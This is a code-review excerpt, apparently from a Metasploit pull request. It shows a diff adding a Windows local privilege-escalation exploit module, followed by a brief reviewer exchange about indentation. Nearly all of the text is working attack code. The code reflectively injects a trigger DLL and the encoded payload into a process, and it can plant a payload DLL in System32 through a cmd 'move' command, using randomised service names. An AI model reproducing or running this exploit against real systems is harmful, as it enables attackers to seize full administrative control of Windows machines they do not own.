modules/exploits/windows/local/tokenmagic.rb

```diff
@@ -0,0 +1,228 @@
+      print_error('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+    process
+  end
+
+  def inject_magic(process)
+
+    if sysinfo['Architecture'] == ARCH_X64
+      library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x64.dll')
+    elsif session.arch == ARCH_X86
+      library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x86.dll')
+    end
+
+    library_path = ::File.expand_path(library_path)
+    print_status("Reflectively injecting the trigger DLL into #{process.pid}...")
+    dll = ''
+    ::File.open(library_path, 'rb') { |f| dll = f.read }
+    exploit_mem, offset = inject_dll_data_into_process(process, dll)
+    vprint_status('Trigger injected.')
+    payload_mem = inject_into_process(process, payload.encoded)
+    print_status('Trigger injected. Starting thread...')
+    process.thread.create(exploit_mem + offset, payload_mem)
+  end
+
+  def launch_dll_trigger
+    begin
+      print_status('Trying to start notepad')
+      process = setup_process
+      inject_magic(process)
+      print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog(e)
+      print_error(e.message)
+    end
+  end
+
+  def payload_arch
+    if payload.arch.include?(ARCH_X64)
+      return ARCH_X64
+    else
+      return ARCH_X86
+    end
+  end
+
+  def exploit
+    win_dir = session.sys.config.getenv('windir')
+    cmd_path = "#{win_dir}\\system32\\cmd.exe"
+    if datastore['SERVICE_FILENAME'].nil? || datastore['SERVICE_FILENAME'].empty?
+      service_filename = Rex::Text.rand_text_alpha(5..9).to_s
+    else
+      service_filename = datastore['SERVICE_FILENAME']
+    end
+    service_filename = "#{service_filename}.exe" unless service_filename.end_with?('.exe')
+    if datastore['SERVICE_NAME'].nil? || datastore['SERVICE_NAME'].empty?
+      service_name = Rex::Text.rand_text_alpha(5..9).to_s
+    else
+      service_name = datastore['SERVICE_NAME']
+    end
+    if datastore['WRITABLE_DIR'].nil? || datastore['WRITABLE_DIR'].empty?
+      writable_dir = session.sys.config.getenv('TEMP').to_s
+    else
+      writable_dir = datastore['WRITABLE_DIR']
+    end
+
+    if datastore['METHOD'] =~ /DLL/i
+      bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
+      payload = generate_payload_dll
+      print_status("Payload DLL is #{payload.length} bytes long")
+      client.core.use('powershell') if !client.ext.aliases.include?('powershell')
+      register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.
+      # Replace Value in Generic Script.
+      cmd_args = "/c move #{bin_path} C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll"
+    else
```

Comment:
I think your indentation is off starting here.

Reply:
It was, I think it got fixed when I refactored. Looking good now